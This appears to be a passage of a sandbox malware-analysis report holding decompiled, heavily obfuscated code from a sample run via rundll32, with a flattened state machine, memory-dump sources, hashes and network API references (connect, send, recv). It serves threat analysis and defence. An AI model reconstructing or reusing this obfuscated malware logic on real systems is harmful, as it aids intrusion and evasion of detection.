                                                                                                                      				_push(_a8);
                                                                                                                      				_v104 = __ecx;
                                                                                                                      				_push(_a4);
                                                                                                                      				_v12 = __edx;
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0034CF25(__edx);
                                                                                                                      				_v124 = 0x410507;
                                                                                                                      				_t531 =  &(( &_v192)[4]);
                                                                                                                      				_v124 = _v124 ^ 0x83a2264d;
                                                                                                                      				_v124 = _v124 >> 0xa;
                                                                                                                      				_t470 = 0;
                                                                                                                      				_t529 = 0;
                                                                                                                      				_t512 = 0x17;
                                                                                                                      				_t524 = 0xd582a45;
                                                                                                                      				_v124 = _v124 * 3;
                                                                                                                      				_v124 = _v124 ^ 0x0062ea59;
                                                                                                                      				_v164 = 0x8ee5f4;
                                                                                                                      				_v164 = _v164 << 0xd;
                                                                                                                      				_v164 = _v164 ^ 0xc2bd4067;
                                                                                                                      				_v164 = _v164 + 0xffffa455;
                                                                                                                      				_v164 = _v164 ^ 0x1e0364bd;
                                                                                                                      				_v116 = 0xd0c3db;
                                                                                                                      				_v116 = _v116 + 0x7244;
                                                                                                                      				_v116 = _v116 + 0xffff5950;
                                                                                                                      				_v116 = _v116 * 0x7d;
                                                                                                                      				_v116 = _v116 ^ 0x65d60932;
                                                                                                                      				_v76 = 0x69c3d0;
                                                                                                                      				_v76 = _v76 + 0x2803;
                                                                                                                      				_v76 = _v76 ^ 0x0109b4af;
                                                                                                                      				_v76 = _v76 ^ 0x016cb6ed;
                                                                                                                      				_v84 = 0x591f9b;
                                                                                                                      				_v84 = _v84 ^ 0x136c22a2;
                                                                                                                      				_v84 = _v84 + 0xbc03;
                                                                                                                      				_v84 = _v84 ^ 0x133eabdb;
                                                                                                                      				_v40 = 0x32843;
                                                                                                                      				_v40 = _v40 + 0x6836;
                                                                                                                      				_v40 = _v40 ^ 0x000a5f7a;
                                                                                                                      				_v96 = 0x3c9c05;
                                                                                                                      				_v96 = _v96 * 0x1a;
                                                                                                                      				_v96 = _v96 ^ 0xb1c6e809;
                                                                                                                      				_v96 = _v96 ^ 0xb7e34fe8;
                                                                                                                      				_v56 = 0xda9312;
                                                                                                                      				_v56 = _v56 / _t512;
                                                                                                                      				_v56 = _v56 ^ 0x0000b271;
                                                                                                                      				_v132 = 0xda0ea8;
                                                                                                                      				_v132 = _v132 | 0xaeef9bf7;
                                                                                                                      				_t513 = 0x71;
                                                                                                                      				_v132 = _v132 / _t513;
                                                                                                                      				_v132 = _v132 ^ 0x01890540;
                                                                                                                      				_v44 = 0x61f218;
                                                                                                                      				_v44 = _v44 + 0xffff41d7;
                                                                                                                      				_v44 = _v44 ^ 0x006fe265;
                                                                                                                      				_v144 = 0x306d33;
                                                                                                                      				_v144 = _v144 + 0xfffff564;
                                                                                                                      				_v144 = _v144 * 0x6e;
                                                                                                                      				_v144 = _v144 + 0xffff469c;
                                                                                                                      				_v144 = _v144 ^ 0x14c9b51d;
                                                                                                                      				_v52 = 0x70de34;
                                                                                                                      				_v52 = _v52 << 3;
                                                                                                                      				_v52 = _v52 ^ 0x038f9e4d;
                                                                                                                      				_v36 = 0x6cb1ac;
                                                                                                                      				_v36 = _v36 + 0x1a54;
                                                                                                                      				_v36 = _v36 ^ 0x00646b3f;
                                                                                                                      				_v152 = 0x976d54;
                                                                                                                      				_v152 = _v152 ^ 0x53b4556c;
                                                                                                                      				_v152 = _v152 ^ 0x5116bac9;
                                                                                                                      				_v152 = _v152 ^ 0x4d195c93;
                                                                                                                      				_v152 = _v152 ^ 0x4f27d4c2;
                                                                                                                      				_v28 = 0x414a88;
                                                                                                                      				_v28 = _v28 | 0x717fc69d;
                                                                                                                      				_v28 = _v28 ^ 0x71799fc5;
                                                                                                                      				_v160 = 0xc7706;
                                                                                                                      				_v160 = _v160 + 0xc91f;
                                                                                                                      				_v160 = _v160 | 0xaa894ceb;
                                                                                                                      				_v160 = _v160 + 0xffffb57b;
                                                                                                                      				_v160 = _v160 ^ 0xaa88db85;
                                                                                                                      				_v168 = 0x67f23c;
                                                                                                                      				_v168 = _v168 ^ 0x8eced2dd;
                                                                                                                      				_v168 = _v168 ^ 0x27c733d3;
                                                                                                                      				_v168 = _v168 ^ 0x736125b9;
                                                                                                                      				_v168 = _v168 ^ 0xda0ef7f2;
                                                                                                                      				_v176 = 0x85bb3;
                                                                                                                      				_v176 = _v176 | 0x89ba1603;
                                                                                                                      				_v176 = _v176 >> 8;
                                                                                                                      				_t514 = 0x6a;
                                                                                                                      				_v176 = _v176 / _t514;
                                                                                                                      				_v176 = _v176 ^ 0x0009ce33;
                                                                                                                      				_v136 = 0xb0a921;
                                                                                                                      				_v136 = _v136 ^ 0x2367151f;
                                                                                                                      				_v136 = _v136 ^ 0x64865221;
                                                                                                                      				_t515 = 0x35;
                                                                                                                      				_v136 = _v136 * 0x3f;
                                                                                                                      				_v136 = _v136 ^ 0x8d2b953d;
                                                                                                                      				_v148 = 0x2df722;
                                                                                                                      				_v148 = _v148 * 0x30;
                                                                                                                      				_v148 = _v148 + 0xd30d;
                                                                                                                      				_v148 = _v148 | 0x68c8f2ae;
                                                                                                                      				_v148 = _v148 ^ 0x68db5c3d;
                                                                                                                      				_v92 = 0xa4f97a;
                                                                                                                      				_v92 = _v92 ^ 0x325a0e28;
                                                                                                                      				_v92 = _v92 + 0x57de;
                                                                                                                      				_v92 = _v92 ^ 0x32f51d21;
                                                                                                                      				_v32 = 0xa83f00;
                                                                                                                      				_v32 = _v32 + 0xffff47e2;
                                                                                                                      				_v32 = _v32 ^ 0x00a2bde7;
                                                                                                                      				_v156 = 0xe5ea35;
                                                                                                                      				_t178 =  &_v156; // 0xe5ea35
                                                                                                                      				_v156 =  *_t178 / _t515;
                                                                                                                      				_v156 = _v156 << 5;
                                                                                                                      				_v156 = _v156 + 0x3621;
                                                                                                                      				_v156 = _v156 ^ 0x008c998d;
                                                                                                                      				_v180 = 0x37bb8c;
                                                                                                                      				_v180 = _v180 ^ 0x8c6790c9;
                                                                                                                      				_t516 = 0x3c;
                                                                                                                      				_v180 = _v180 * 0x44;
                                                                                                                      				_v180 = _v180 | 0x3ef8ecb7;
                                                                                                                      				_v180 = _v180 ^ 0x7ff3e314;
                                                                                                                      				_v88 = 0x10d686;
                                                                                                                      				_v88 = _v88 + 0xffff44b6;
                                                                                                                      				_v88 = _v88 / _t516;
                                                                                                                      				_v88 = _v88 ^ 0x000573bd;
                                                                                                                      				_v64 = 0x2cf4a8;
                                                                                                                      				_v64 = _v64 << 0xb;
                                                                                                                      				_v64 = _v64 + 0xffff4c9b;
                                                                                                                      				_v64 = _v64 ^ 0x67a6f27b;
                                                                                                                      				_v188 = 0x434d7c;
                                                                                                                      				_t218 =  &_v188; // 0x434d7c
                                                                                                                      				_v188 =  *_t218 * 0x14;
                                                                                                                      				_v188 = _v188 + 0xffff53dc;
                                                                                                                      				_v188 = _v188 * 0x58;
                                                                                                                      				_v188 = _v188 ^ 0xce78d82e;
                                                                                                                      				_v48 = 0x39a498;
                                                                                                                      				_v48 = _v48 + 0xd90b;
                                                                                                                      				_v48 = _v48 ^ 0x00328937;
                                                                                                                      				_v172 = 0x329194;
                                                                                                                      				_v172 = _v172 + 0x15c2;
                                                                                                                      				_v172 = _v172 ^ 0x8846dc1f;
                                                                                                                      				_v172 = _v172 + 0x561;
                                                                                                                      				_v172 = _v172 ^ 0x8878b13b;
                                                                                                                      				_v140 = 0x921bc4;
                                                                                                                      				_v140 = _v140 | 0xc689e64a;
                                                                                                                      				_v140 = _v140 >> 0xc;
                                                                                                                      				_v140 = _v140 ^ 0x67a6be9d;
                                                                                                                      				_v140 = _v140 ^ 0x67a0761b;
                                                                                                                      				_v72 = 0xa3a418;
                                                                                                                      				_t517 = 0x26;
                                                                                                                      				_v72 = _v72 * 0x26;
                                                                                                                      				_v72 = _v72 >> 0x10;
                                                                                                                      				_v72 = _v72 ^ 0x0002c06b;
                                                                                                                      				_v108 = 0xd1ae1a;
                                                                                                                      				_v108 = _v108 ^ 0x567f87f9;
                                                                                                                      				_v108 = _v108 | 0x0eb5e220;
                                                                                                                      				_v108 = _v108 ^ 0x558f672f;
                                                                                                                      				_v108 = _v108 ^ 0x0b3c3f9a;
                                                                                                                      				_v80 = 0x5d29a8;
                                                                                                                      				_v80 = _v80 | 0x5a2f4123;
                                                                                                                      				_v80 = _v80 / _t517;
                                                                                                                      				_v80 = _v80 ^ 0x0265326d;
                                                                                                                      				_v184 = 0x50dc21;
                                                                                                                      				_v184 = _v184 + 0xffff863b;
                                                                                                                      				_v184 = _v184 + 0xffff7ebb;
                                                                                                                      				_v184 = _v184 + 0x5f54;
                                                                                                                      				_v184 = _v184 ^ 0x005a5f37;
                                                                                                                      				_v68 = 0x13fcd3;
                                                                                                                      				_v68 = _v68 + 0x7ca8;
                                                                                                                      				_v68 = _v68 >> 3;
                                                                                                                      				_v68 = _v68 ^ 0x000ac947;
                                                                                                                      				_v24 = 0xc2d10f;
                                                                                                                      				_v24 = _v24 + 0xffff657d;
                                                                                                                      				_v24 = _v24 ^ 0x00c52471;
                                                                                                                      				_v192 = 0x48c156;
                                                                                                                      				_v192 = _v192 >> 4;
                                                                                                                      				_t518 = 0x2f;
                                                                                                                      				_v192 = _v192 * 0x2f;
                                                                                                                      				_v192 = _v192 + 0xffffa98f;
                                                                                                                      				_v192 = _v192 ^ 0x00d9c1bc;
                                                                                                                      				_v112 = 0xb16c9;
                                                                                                                      				_v112 = _v112 >> 0xe;
                                                                                                                      				_v112 = _v112 << 0x10;
                                                                                                                      				_v112 = _v112 / _t518;
                                                                                                                      				_v112 = _v112 ^ 0x00028b59;
                                                                                                                      				_v120 = 0x2563ad;
                                                                                                                      				_t519 = 0x30;
                                                                                                                      				_v120 = _v120 / _t519;
                                                                                                                      				_v120 = _v120 + 0xffffe9b6;
                                                                                                                      				_v120 = _v120 >> 8;
                                                                                                                      				_v120 = _v120 ^ 0x000e86e4;
                                                                                                                      				_v60 = 0x629492;
                                                                                                                      				_t520 = 0x32;
                                                                                                                      				_v60 = _v60 / _t520;
                                                                                                                      				_v60 = _v60 << 0xa;
                                                                                                                      				_v60 = _v60 ^ 0x07e42de9;
                                                                                                                      				_v128 = 0x197221;
                                                                                                                      				_v128 = _v128 >> 0xf;
                                                                                                                      				_v128 = _v128 << 1;
                                                                                                                      				_v128 = _v128 * 0x2e;
                                                                                                                      				_v128 = _v128 ^ 0x0004057d;
                                                                                                                      				_t521 = _v16;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					goto L2;
                                                                                                                      					do {
                                                                                                                      						while(1) {
                                                                                                                      							L2:
                                                                                                                      							_t533 = _t524 - 0x94e79b7;
                                                                                                                      							if(_t533 > 0) {
                                                                                                                      								break;
                                                                                                                      							}
                                                                                                                      							if(_t533 == 0) {
                                                                                                                      								_push(_t471);
                                                                                                                      								_push(_t471);
                                                                                                                      								_t445 = E00353512(0x20000);
                                                                                                                      								_t470 = _t445;
                                                                                                                      								if(_t470 != 0) {
                                                                                                                      									_t524 = 0x4150ae2;
                                                                                                                      									goto L12;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_t524 == 0x35d4444) {
                                                                                                                      									_t453 = E00342E96(_v148, _v92, _v32, _v116, _v156,  *_t521, _v12);
                                                                                                                      									_t471 = _v104;
                                                                                                                      									_t531 =  &(_t531[5]);
                                                                                                                      									_v20 = _t453;
                                                                                                                      									_t505 = 0x812254d;
                                                                                                                      									_t524 =  !=  ? 0x812254d : 0x4f6d4ac;
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      									if(_t524 == 0x4150ae2) {
                                                                                                                      										_push(_t471);
                                                                                                                      										_push(_t471);
                                                                                                                      										_t529 = E00353512(0x2000);
                                                                                                                      										_t524 =  !=  ? 0xd2f1d9f : 0x98aa4b1;
                                                                                                                      										goto L12;
                                                                                                                      									} else {
                                                                                                                      										if(_t524 == 0x4f6d4ac) {
                                                                                                                      											_t521 = _t521 + 0x2c;
                                                                                                                      											asm("sbb esi, esi");
                                                                                                                      											_t524 = (_t524 & 0xf5c6e621) + 0xd965e23;
                                                                                                                      											continue;
                                                                                                                      										} else {
                                                                                                                      											if(_t524 == 0x53e4020) {
                                                                                                                      												E00358CD6(_v164, _t471, _t529, _v108, _v80);
                                                                                                                      												_t531 =  &(_t531[3]);
                                                                                                                      												L11:
                                                                                                                      												_t524 = 0xd965e23;
                                                                                                                      												L12:
                                                                                                                      												L13:
                                                                                                                      												_t471 = _v104;
                                                                                                                      												goto L1;
                                                                                                                      											} else {
                                                                                                                      												if(_t524 == _t505) {
                                                                                                                      													E003495C9(_t529,  &_v8, _v180, _v124, _v20, _v88, _v64, _v188);
                                                                                                                      													_t524 =  !=  ? 0x53e4020 : 0x4f6d4ac;
                                                                                                                      													E0035E689(_v48, _v172, _v140, _v20, _v72);
                                                                                                                      													_t531 =  &(_t531[0xa]);
                                                                                                                      													L28:
                                                                                                                      													_t471 = _v104;
                                                                                                                      													_t505 = 0x812254d;
                                                                                                                      												}
                                                                                                                      												goto L29;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							goto L30;
                                                                                                                      						}
                                                                                                                      						if(_t524 == 0x98aa4b1) {
                                                                                                                      							E003468DE(_v112, _v120, _v60, _v128, _t470);
                                                                                                                      							_t531 =  &(_t531[3]);
                                                                                                                      							_t524 = 0x34e8be;
                                                                                                                      							goto L28;
                                                                                                                      						} else {
                                                                                                                      							if(_t524 == 0xd2f1d9f) {
                                                                                                                      								_t473 = _v44;
                                                                                                                      								_t448 = E0035E9E9(_v44, _v144, _v52,  &_v16, _v36, _v152,  &_v4, _v12, _v28, _t471, _t471, _v160, _t471, _t471, _v168, _t471, _v176, _t471, _t470);
                                                                                                                      								_t531 =  &(_t531[0x11]);
                                                                                                                      								if(_t448 == 0) {
                                                                                                                      									goto L11;
                                                                                                                      								} else {
                                                                                                                      									_t467 = E00345AE2(_t473);
                                                                                                                      									_t524 = 0x35d4444;
                                                                                                                      									_v100 = _v16 * 0x2c + _t470;
                                                                                                                      									_t521 =  >=  ? _t470 : (_t467 & 0x0000001f) * 0x2c + _t470;
                                                                                                                      									goto L13;
                                                                                                                      								}
                                                                                                                      								L31:
                                                                                                                      							} else {
                                                                                                                      								if(_t524 == 0xd582a45) {
                                                                                                                      									_t524 = 0x94e79b7;
                                                                                                                      									goto L2;
                                                                                                                      								} else {
                                                                                                                      									if(_t524 != 0xd965e23) {
                                                                                                                      										goto L29;
                                                                                                                      									} else {
                                                                                                                      										E003468DE(_v184, _v68, _v24, _v192, _t529);
                                                                                                                      										_t531 =  &(_t531[3]);
                                                                                                                      										_t524 = 0x98aa4b1;
                                                                                                                      										goto L12;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						break;
                                                                                                                      						L29:
                                                                                                                      						_t445 = _v100;
                                                                                                                      					} while (_t524 != 0x34e8be);
                                                                                                                      					L30:
                                                                                                                      					return _t445;
                                                                                                                      					goto L31;
                                                                                                                      				}
                                                                                                                      			}
                                                                                                                      0x0035ef5d
                                                                                                                      0x0035ef68
                                                                                                                      0x0035ef73
                                                                                                                      0x0035ef7e
                                                                                                                      0x0035ef89
                                                                                                                      0x0035ef94
                                                                                                                      0x0035ef9f
                                                                                                                      0x0035efaa
                                                                                                                      0x0035efb5
                                                                                                                      0x0035efc0
                                                                                                                      0x0035efcd
                                                                                                                      0x0035efd1
                                                                                                                      0x0035efd9
                                                                                                                      0x0035efe1
                                                                                                                      0x0035eff7
                                                                                                                      0x0035effe
                                                                                                                      0x0035f009
                                                                                                                      0x0035f011
                                                                                                                      0x0035f01d
                                                                                                                      0x0035f020
                                                                                                                      0x0035f024
                                                                                                                      0x0035f02c
                                                                                                                      0x0035f037
                                                                                                                      0x0035f042
                                                                                                                      0x0035f04d
                                                                                                                      0x0035f055
                                                                                                                      0x0035f062
                                                                                                                      0x0035f066
                                                                                                                      0x0035f06e
                                                                                                                      0x0035f076
                                                                                                                      0x0035f081
                                                                                                                      0x0035f089
                                                                                                                      0x0035f094
                                                                                                                      0x0035f09f
                                                                                                                      0x0035f0aa
                                                                                                                      0x0035f0b5
                                                                                                                      0x0035f0bf
                                                                                                                      0x0035f0c7
                                                                                                                      0x0035f0cf
                                                                                                                      0x0035f0d7
                                                                                                                      0x0035f0df
                                                                                                                      0x0035f0ea
                                                                                                                      0x0035f0f5
                                                                                                                      0x0035f100
                                                                                                                      0x0035f108
                                                                                                                      0x0035f110
                                                                                                                      0x0035f118
                                                                                                                      0x0035f120
                                                                                                                      0x0035f128
                                                                                                                      0x0035f130
                                                                                                                      0x0035f138
                                                                                                                      0x0035f140
                                                                                                                      0x0035f148
                                                                                                                      0x0035f150
                                                                                                                      0x0035f158
                                                                                                                      0x0035f160
                                                                                                                      0x0035f16b
                                                                                                                      0x0035f170
                                                                                                                      0x0035f176
                                                                                                                      0x0035f17e
                                                                                                                      0x0035f186
                                                                                                                      0x0035f18e
                                                                                                                      0x0035f19b
                                                                                                                      0x0035f19e
                                                                                                                      0x0035f1a2
                                                                                                                      0x0035f1aa
                                                                                                                      0x0035f1b7
                                                                                                                      0x0035f1bb
                                                                                                                      0x0035f1c3
                                                                                                                      0x0035f1cb
                                                                                                                      0x0035f1d3
                                                                                                                      0x0035f1db
                                                                                                                      0x0035f1e3
                                                                                                                      0x0035f1eb
                                                                                                                      0x0035f1f3
                                                                                                                      0x0035f1fe
                                                                                                                      0x0035f209
                                                                                                                      0x0035f214
                                                                                                                      0x0035f21c
                                                                                                                      0x0035f224
                                                                                                                      0x0035f228
                                                                                                                      0x0035f22d
                                                                                                                      0x0035f235
                                                                                                                      0x0035f23d
                                                                                                                      0x0035f245
                                                                                                                      0x0035f252
                                                                                                                      0x0035f253
                                                                                                                      0x0035f257
                                                                                                                      0x0035f25f
                                                                                                                      0x0035f267
                                                                                                                      0x0035f26f
                                                                                                                      0x0035f27d
                                                                                                                      0x0035f281
                                                                                                                      0x0035f289
                                                                                                                      0x0035f294
                                                                                                                      0x0035f29c
                                                                                                                      0x0035f2a7
                                                                                                                      0x0035f2b2
                                                                                                                      0x0035f2ba
                                                                                                                      0x0035f2bf
                                                                                                                      0x0035f2c3
                                                                                                                      0x0035f2d0
                                                                                                                      0x0035f2d6
                                                                                                                      0x0035f2de
                                                                                                                      0x0035f2e9
                                                                                                                      0x0035f2f4
                                                                                                                      0x0035f2ff
                                                                                                                      0x0035f307
                                                                                                                      0x0035f30f
                                                                                                                      0x0035f317
                                                                                                                      0x0035f31f
                                                                                                                      0x0035f327
                                                                                                                      0x0035f32f
                                                                                                                      0x0035f337
                                                                                                                      0x0035f33c
                                                                                                                      0x0035f344
                                                                                                                      0x0035f34c
                                                                                                                      0x0035f361
                                                                                                                      0x0035f364
                                                                                                                      0x0035f36b
                                                                                                                      0x0035f373
                                                                                                                      0x0035f37e
                                                                                                                      0x0035f386
                                                                                                                      0x0035f38e
                                                                                                                      0x0035f396
                                                                                                                      0x0035f39e
                                                                                                                      0x0035f3a6
                                                                                                                      0x0035f3b1
                                                                                                                      0x0035f3c7
                                                                                                                      0x0035f3ce
                                                                                                                      0x0035f3d9
                                                                                                                      0x0035f3e1
                                                                                                                      0x0035f3e9
                                                                                                                      0x0035f3f1
                                                                                                                      0x0035f3f9
                                                                                                                      0x0035f401
                                                                                                                      0x0035f40c
                                                                                                                      0x0035f417
                                                                                                                      0x0035f41f
                                                                                                                      0x0035f42a
                                                                                                                      0x0035f435
                                                                                                                      0x0035f440
                                                                                                                      0x0035f44b
                                                                                                                      0x0035f453
                                                                                                                      0x0035f45d
                                                                                                                      0x0035f460
                                                                                                                      0x0035f464
                                                                                                                      0x0035f46c
                                                                                                                      0x0035f474
                                                                                                                      0x0035f47c
                                                                                                                      0x0035f481
                                                                                                                      0x0035f48e
                                                                                                                      0x0035f492
                                                                                                                      0x0035f49a
                                                                                                                      0x0035f4a6
                                                                                                                      0x0035f4ab
                                                                                                                      0x0035f4b1
                                                                                                                      0x0035f4b9
                                                                                                                      0x0035f4be
                                                                                                                      0x0035f4c6
                                                                                                                      0x0035f4d8
                                                                                                                      0x0035f4db
                                                                                                                      0x0035f4e2
                                                                                                                      0x0035f4ea
                                                                                                                      0x0035f4f5
                                                                                                                      0x0035f4fd
                                                                                                                      0x0035f502
                                                                                                                      0x0035f50b
                                                                                                                      0x0035f50f
                                                                                                                      0x0035f517
                                                                                                                      0x0035f522
                                                                                                                      0x0035f522
                                                                                                                      0x0035f522
                                                                                                                      0x0035f527
                                                                                                                      0x0035f527
                                                                                                                      0x0035f527
                                                                                                                      0x0035f527
                                                                                                                      0x0035f52d
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0035f533
                                                                                                                      0x0035f6ab
                                                                                                                      0x0035f6ac
                                                                                                                      0x0035f6b2
                                                                                                                      0x0035f6b7
                                                                                                                      0x0035f6bd
                                                                                                                      0x0035f6c3
                                                                                                                      0x00000000
                                                                                                                      0x0035f6c3
                                                                                                                      0x0035f539
                                                                                                                      0x0035f53f
                                                                                                                      0x0035f66e
                                                                                                                      0x0035f673
                                                                                                                      0x0035f677
                                                                                                                      0x0035f67c
                                                                                                                      0x0035f68c
                                                                                                                      0x0035f691
                                                                                                                      0x00000000
                                                                                                                      0x0035f545
                                                                                                                      0x0035f54b
                                                                                                                      0x0035f62a
                                                                                                                      0x0035f62b
                                                                                                                      0x0035f636
                                                                                                                      0x0035f646
                                                                                                                      0x00000000
                                                                                                                      0x0035f551
                                                                                                                      0x0035f557
                                                                                                                      0x0035f603
                                                                                                                      0x0035f608
                                                                                                                      0x0035f610
                                                                                                                      0x00000000
                                                                                                                      0x0035f55d
                                                                                                                      0x0035f564
                                                                                                                      0x0035f5e9
                                                                                                                      0x0035f5ee
                                                                                                                      0x0035f5f1
                                                                                                                      0x0035f5f1

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #A/Z$3m0$5$7_Z$?kd$Dr$E*X$E*X$Yb$eo$|MC
                                                                                                                      • API String ID: 0-1059594742
                                                                                                                      • Opcode ID: 17c914c607d4fd6e8b14c60ccda3ed0ff62bbfef5d0e6b580ac1b24a080d4d8a
                                                                                                                      • Instruction ID: b36f1e3edb498be4f474ddb3d1bc0dfbb0ee5cba6d13d515933fbee027532c5a
                                                                                                                      • Opcode Fuzzy Hash: 17c914c607d4fd6e8b14c60ccda3ed0ff62bbfef5d0e6b580ac1b24a080d4d8a
                                                                                                                      • Instruction Fuzzy Hash: 1D2222719083808FE365CF25C58AA4FFBE1BBC4354F108A2DE9D996260E7B19949CF53
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 10012C6C
                                                                                                                      • connect.WS2_32(?,?,00000010), ref: 10012CA7
                                                                                                                      • _strcat.LIBCMT ref: 10012CE9
                                                                                                                      • send.WS2_32(?,?,00000064,00000000), ref: 10012D06
                                                                                                                      • recv.WS2_32(000000FF,?,00000064,00000000), ref: 10012D9D
                                                                                                                        • Part of subcall function 1001DDF4: IsWindow.USER32(?), ref: 1001DE03
                                                                                                                        • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                        • Part of subcall function 1001DD46: GetDlgItem.USER32(?,C5005C0B), ref: 1001DD53
                                                                                                                        • Part of subcall function 1001DDF4: SetWindowTextA.USER32(?,00000064), ref: 1001DE2B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$EnableItemText_memset_strcatconnectrecvsend
                                                                                                                      • String ID: Connected$Disconnected$Wait...
                                                                                                                      • API String ID: 2263617321-2304371739
                                                                                                                      • Opcode ID: d48f4256781d7f2df666ac26c57b600e12e739e225c0d9a3066db47a13ab057d
                                                                                                                      • Instruction ID: 6a29e3ac87f5f9b0e95b07577220059068a2bdb443e3840c63f2d59567e72b14
                                                                                                                      • Opcode Fuzzy Hash: d48f4256781d7f2df666ac26c57b600e12e739e225c0d9a3066db47a13ab057d
                                                                                                                      • Instruction Fuzzy Hash: 26513DB4A002189BDB14EBA8CC95BEEB7B1FF48308F104169E5066F2C2DF75A991CF44
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E0034472E(void* __ecx) {
                                                                                                                      				char _v524;
                                                                                                                      				char _v1044;
                                                                                                                      				char _v1564;
                                                                                                                      				char _v2084;
                                                                                                                      				char _v2604;
                                                                                                                      				intOrPtr _v2608;
                                                                                                                      				intOrPtr _v2612;
                                                                                                                      				char _v2616;
                                                                                                                      				intOrPtr _v2620;
                                                                                                                      				char _v2624;
                                                                                                                      				signed int _v2628;
                                                                                                                      				signed int _v2632;
                                                                                                                      				signed int _v2636;
                                                                                                                      				signed int _v2640;
                                                                                                                      				signed int _v2644;
                                                                                                                      				signed int _v2648;
                                                                                                                      				signed int _v2652;
                                                                                                                      				signed int _v2656;
                                                                                                                      				signed int _v2660;
                                                                                                                      				signed int _v2664;
                                                                                                                      				signed int _v2668;
                                                                                                                      				signed int _v2672;
                                                                                                                      				signed int _v2676;
                                                                                                                      				signed int _v2680;
                                                                                                                      				signed int _v2684;
                                                                                                                      				signed int _v2688;
                                                                                                                      				signed int _v2692;
                                                                                                                      				signed int _v2696;
                                                                                                                      				signed int _v2700;
                                                                                                                      				signed int _v2704;
                                                                                                                      				signed int _v2708;
                                                                                                                      				signed int _v2712;
                                                                                                                      				signed int _v2716;
                                                                                                                      				signed int _v2720;
                                                                                                                      				signed int _v2724;
                                                                                                                      				signed int _v2728;
                                                                                                                      				signed int _v2732;
                                                                                                                      				signed int _v2736;
                                                                                                                      				signed int _v2740;
                                                                                                                      				signed int _v2744;
                                                                                                                      				signed int _v2748;
                                                                                                                      				signed int _v2752;
                                                                                                                      				signed int _v2756;
                                                                                                                      				signed int _v2760;
                                                                                                                      				signed int _v2764;
                                                                                                                      				signed int _v2768;
                                                                                                                      				signed int _v2772;
                                                                                                                      				signed int _v2776;
                                                                                                                      				signed int _v2780;
                                                                                                                      				signed int _v2784;
                                                                                                                      				signed int _v2788;
                                                                                                                      				signed int _v2792;
                                                                                                                      				signed int _v2796;
                                                                                                                      				signed int _v2800;
                                                                                                                      				signed int _v2804;
                                                                                                                      				signed int _v2808;
                                                                                                                      				signed int _v2812;
                                                                                                                      				signed int _v2816;
                                                                                                                      				signed int _v2820;
                                                                                                                      				signed int _v2824;
                                                                                                                      				signed int _v2828;
                                                                                                                      				signed int _v2832;
                                                                                                                      				signed int _v2836;
                                                                                                                      				signed int _v2840;
                                                                                                                      				signed int _v2844;
                                                                                                                      				signed int _v2848;
                                                                                                                      				signed int _v2852;
                                                                                                                      				signed int _v2856;
                                                                                                                      				signed int _v2860;
                                                                                                                      				signed int _v2864;
                                                                                                                      				signed int _v2868;
                                                                                                                      				signed int _v2872;
                                                                                                                      				signed int _v2876;
                                                                                                                      				signed int _v2880;
                                                                                                                      				signed int _v2884;
                                                                                                                      				signed int _v2888;
                                                                                                                      				signed int _v2892;
                                                                                                                      				signed int _v2896;
                                                                                                                      				signed int _v2900;
                                                                                                                      				signed int _v2904;
                                                                                                                      				signed int _v2908;
                                                                                                                      				signed int _v2912;
                                                                                                                      				signed int _v2916;
                                                                                                                      				signed int _v2920;
                                                                                                                      				signed int _v2924;
                                                                                                                      				signed int _v2928;
                                                                                                                      				signed int _v2932;
                                                                                                                      				signed int _v2936;
                                                                                                                      				signed int _v2940;
                                                                                                                      				signed int _t797;
                                                                                                                      				void* _t798;
                                                                                                                      				void* _t812;
                                                                                                                      				signed int _t830;
                                                                                                                      				signed int _t832;
                                                                                                                      				signed int _t833;
                                                                                                                      				signed int _t834;
                                                                                                                      				signed int _t835;
                                                                                                                      				signed int _t836;
                                                                                                                      				signed int _t837;
                                                                                                                      				signed int _t838;
                                                                                                                      				signed int _t839;
                                                                                                                      				signed int _t840;
                                                                                                                      				signed int _t841;
                                                                                                                      				signed int _t842;
				signed int _t843;
				signed int _t844;
				signed int _t845;
				signed int _t846;
				signed int _t847;
				signed int _t848;
				signed int _t849;
				signed int _t850;
				signed int _t851;
